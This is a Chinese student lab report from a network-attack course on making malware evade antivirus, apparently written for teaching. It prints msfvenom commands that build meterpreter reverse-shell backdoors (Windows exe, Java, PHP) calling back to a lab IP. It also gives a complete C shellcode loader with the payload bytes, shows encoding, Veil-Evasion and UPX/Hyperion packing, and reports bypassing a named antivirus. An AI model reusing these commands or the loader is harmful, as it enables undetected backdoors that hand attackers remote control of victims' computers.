2019-2020-2 《网络对抗技术》 Exp3 免杀原理与实践
一 . 知识小结
免杀概念
- 一般是对恶意软件做处理,让它不被杀毒软件所检测。
基础问题回答
杀软是如何检测出恶意代码的?
- 基于特征码的检测
一段特征码就是一段或多段数据,经过对许多恶意代码的分析,我们发现了该类恶意代码经常出现的一段或多段代码,而且是其他正常程序没有的,即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。- 启发式恶意软件检测
就是根据些片面特征去推断。通常是因为缺乏精确判定依据。(非精确)- 基于行为的恶意软件检测
为加入了行为监控的启发式。通过对恶意代码的观察研究,发现有一些行为是恶意代码共同的比较特殊的行为,杀软会监视程序的运行,如果发现了这些特殊行为,就会认为其是恶意软件。(非精确)
免杀是做什么?
- 一般是对恶意软件做处理,让它不被杀毒软件所检测
免杀的基本方法有哪些?
- 改变特征码
只有EXE— 加壳(压缩壳 加密壳)
有shellcode(像Meterpreter)—利用encode进行编码
有源代码——用其他语言进行重写再编译- 改变行为
通讯方式
尽量使用反弹式连接:meterpreter本身即主要使用反弹连接
使用隧道技术:如dns2tcp、iodine可将流量封闭为DNS协议包
加密通讯数据:如使用reverse-https进行转发
操作模式
基于内存操作:meterpreter是基于内存操作的操作的
减少对系统的修改
加入混淆作用的正常功能代码
开启杀软能绝对防止电脑中恶意代码吗?
- 不能。部分恶意代码能隐藏自己行为,计算机中无绝对
二 . 实验步骤
1. 正确使用msf编码器
在实验二中使用msf生成了后门程序,我们可以使用virtotal网站进行扫描
-e用编码器进行编码并进行扫描:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b 'x00' LHOST=192.168.10.128 LPORT=5305 -f exe > met-encoded.exe
VirusTotal网站的扫描结果如下:
-i 编码十次并进行扫描:
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b 'x00' LHOST=192.168.10.128 LPORT=5305 -f exe > met-encoded10.exe
VirusTotal网站的扫描结果如下:
结论:多次编码无法对免杀起到作用
2.msfvenom生成如jar其他类型文件
2.1.生成jar文件
- 使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 jar> 20175305_java_backdoor.jar
- 扫描结果如下:
2.2. 生成php文件
- 使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 x> 20175305_php_backdoor.php
- 扫描结果如下:
3.veil
- 用
apt-get install veil-evasion命令安装veil - 之后打开veil,输入y继续安装直至完成:
成功的话会出现下面这个界面:
list查看所有可用的payload
use [payload_number]选择某个payload使用
set [选项] [参数]修改options
generate开始生成文件
过程中给文件起名:
- 用virustotal检测结果如下:
4.使用C + shellcode编程
- 首先使用命令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.128 LPORT=5305 -f c用c语言生成一段shellcode:
创建一个文件,然后将unsigned char buf[]赋值到其中,代码如下:
unsigned char buf[] =
"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
"x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff"
"xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52"
"x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1"
"x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b"
"x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03"
"x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b"
"x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24"
"x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb"
"x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c"
"x77x26x07x89xe8xffxd0xb8x90x01x00x00x29xc4x54"
"x50x68x29x80x6bx00xffxd5x6ax0ax68xc0xa8xe6x80"
"x68x02x00x14xc6x89xe6x50x50x50x50x40x50x40x50"
"x68xeax0fxdfxe0xffxd5x97x6ax10x56x57x68x99xa5"
"x74x61xffxd5x85xc0x74x0axffx4ex08x75xecxe8x67"
"x00x00x00x6ax00x6ax04x56x57x68x02xd9xc8x5fxff"
"xd5x83xf8x00x7ex36x8bx36x6ax40x68x00x10x00x00"
"x56x6ax00x68x58xa4x53xe5xffxd5x93x53x6ax00x56"
"x53x57x68x02xd9xc8x5fxffxd5x83xf8x00x7dx28x58"
"x68x00x40x00x00x6ax00x50x68x0bx2fx0fx30xffxd5"
"x57x68x75x6ex4dx61xffxd5x5ex5exffx0cx24x0fx85"
"x70xffxffxffxe9x9bxffxffxffx01xc3x29xc6x75xc1"
"xc3xbbxf0xb5xa2x56x6ax00x53xffxd5";
int main()
{
int (*func)() = (int(*)())buf;
func();
}
- 使用命令:
i686-w64-mingw32-g++ 20175305-backdoor.c -o 20175305-backdoor.exe编译为可执行文件
用virustotal检测结果如下:
5.加壳工具
5.1.压缩壳UPX
使用upx 20175305_veil_backdoor.exe -o 20175305_veil_backdoor_upx.exe命令加密刚才生成的程序
用virustotal检测结果如下:
5.2.加密壳Hyperion
将上一个生成的文件拷贝至/usr/share/windows-binaries/hyperion,并进入该目录
输入命令wine hyperion.exe -v upxed_20175305.exe upxed_20175305_hyperion.exe
对生成的文件进行扫描
用virustotal检测结果如下:
6.使用其他课程未介绍的方法
采用Veil-Evasion的其他荷载生成后门方式
进入evasion,使用list查看可用的有效荷载:
- 选择第32个荷载,是Python下shellcode在DES
下加密一种。 - 输入
option,查看有效荷载的选项,如下:
我们对其进行基本的配置:
- 设置反弹IP以及端口号,设置生成文件的名字和格式,在
msfconsole中输入指令、测试可用性
用virustotal检测结果如下:
2.通过组合应用各种技术实现恶意代码免杀
参照同学使用Evasion模块免杀,这里通过C+shellcode和加壳的方式实现免杀。
3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
电脑版本:Windows 10,通过C+shellcode和加壳的方式实现免杀
杀毒软件:火绒
三 . 实验总结与体会
本次实验感觉是目前做过的比较难的实验了,了解有关杀软查杀的各种资料,网站,研究如何让实验后门程序躲过查杀,参照了同学的博客和资料,问了好多人,终于做出来了,成就感满满,但是有些疑惑这个实验实用性是什么,我们为了杀毒首先应该知道病毒如何隐藏免杀嘛。